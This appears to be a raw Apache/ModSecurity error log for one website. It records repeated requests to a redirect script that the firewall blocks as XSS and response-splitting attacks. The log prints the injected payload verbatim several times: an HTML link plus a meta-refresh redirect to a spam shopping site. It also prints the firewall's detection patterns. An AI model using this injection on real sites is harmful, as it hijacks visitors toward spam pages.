[Tue May 12 06:19:06.931314 2026] [security2:error] [pid 1808852:tid 1808857] [client 27.78.84.116:62255] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta ht..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqOhfeipD4uoG21FpBgQAAAAI"]
[Tue May 12 06:19:06.931476 2026] [security2:error] [pid 1808852:tid 1808857] [client 27.78.84.116:62255] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqOhfeipD4uoG21FpBgQAAAAI"]
[Tue May 12 06:19:06.931593 2026] [security2:error] [pid 1808852:tid 1808857] [client 27.78.84.116:62255] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [ta [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqOhfeipD4uoG21FpBgQAAAAI"]
[Tue May 12 06:19:06.931766 2026] [security2:error] [pid 1808852:tid 1808857] [client 27.78.84.116:62255] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqOhfeipD4uoG21FpBgQAAAAI"]
[Tue May 12 06:19:06.932232 2026] [security2:error] [pid 1808852:tid 1808857] [client 27.78.84.116:62255] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqOhfeipD4uoG21FpBgQAAAAI"]
[Tue May 12 06:19:06.932514 2026] [security2:error] [pid 1808852:tid 1808857] [client 27.78.84.116:62255] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqOhfeipD4uoG21FpBgQAAAAI"]
[Tue May 12 06:19:14.757424 2026] [security2:error] [pid 1825179:tid 1825219] [client 27.78.84.116:62373] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqQtr1yOh9TvizeziunQAAAFU"]
[Tue May 12 06:19:14.757830 2026] [security2:error] [pid 1825179:tid 1825219] [client 27.78.84.116:62373] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta ht..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqQtr1yOh9TvizeziunQAAAFU"]
[Tue May 12 06:19:14.758010 2026] [security2:error] [pid 1825179:tid 1825219] [client 27.78.84.116:62373] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqQtr1yOh9TvizeziunQAAAFU"]
[Tue May 12 06:19:14.758146 2026] [security2:error] [pid 1825179:tid 1825219] [client 27.78.84.116:62373] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [ta [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqQtr1yOh9TvizeziunQAAAFU"]
[Tue May 12 06:19:14.758320 2026] [security2:error] [pid 1825179:tid 1825219] [client 27.78.84.116:62373] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqQtr1yOh9TvizeziunQAAAFU"]
[Tue May 12 06:19:14.758748 2026] [security2:error] [pid 1825179:tid 1825219] [client 27.78.84.116:62373] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqQtr1yOh9TvizeziunQAAAFU"]
[Tue May 12 06:19:14.759040 2026] [security2:error] [pid 1825179:tid 1825219] [client 27.78.84.116:62373] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqQtr1yOh9TvizeziunQAAAFU"]
[Tue May 12 06:19:17.492065 2026] [authz_core:error] [pid 1825179:tid 1825212] [client 207.46.13.78:51588] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/error_log
[Tue May 12 06:19:22.893401 2026] [security2:error] [pid 1844863:tid 1844887] [client 27.78.84.116:63270] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqSvaAnTZtx1_H_wzHVQAAAVI"]
[Tue May 12 06:19:22.893813 2026] [security2:error] [pid 1844863:tid 1844887] [client 27.78.84.116:63270] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta ht..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqSvaAnTZtx1_H_wzHVQAAAVI"]
[Tue May 12 06:19:22.893986 2026] [security2:error] [pid 1844863:tid 1844887] [client 27.78.84.116:63270] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqSvaAnTZtx1_H_wzHVQAAAVI"]
[Tue May 12 06:19:22.894098 2026] [security2:error] [pid 1844863:tid 1844887] [client 27.78.84.116:63270] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [ta [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqSvaAnTZtx1_H_wzHVQAAAVI"]
[Tue May 12 06:19:22.894265 2026] [security2:error] [pid 1844863:tid 1844887] [client 27.78.84.116:63270] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqSvaAnTZtx1_H_wzHVQAAAVI"]
[Tue May 12 06:19:22.894702 2026] [security2:error] [pid 1844863:tid 1844887] [client 27.78.84.116:63270] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqSvaAnTZtx1_H_wzHVQAAAVI"]
[Tue May 12 06:19:22.894984 2026] [security2:error] [pid 1844863:tid 1844887] [client 27.78.84.116:63270] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqSvaAnTZtx1_H_wzHVQAAAVI"]
[Tue May 12 06:19:25.508746 2026] [security2:error] [pid 1825287:tid 1825324] [client 27.78.84.116:64130] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqTQgpmE1yW0glLdg9XAAAANM"]
[Tue May 12 06:19:25.509178 2026] [security2:error] [pid 1825287:tid 1825324] [client 27.78.84.116:64130] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta ht..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqTQgpmE1yW0glLdg9XAAAANM"]
[Tue May 12 06:19:25.509346 2026] [security2:error] [pid 1825287:tid 1825324] [client 27.78.84.116:64130] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqTQgpmE1yW0glLdg9XAAAANM"]
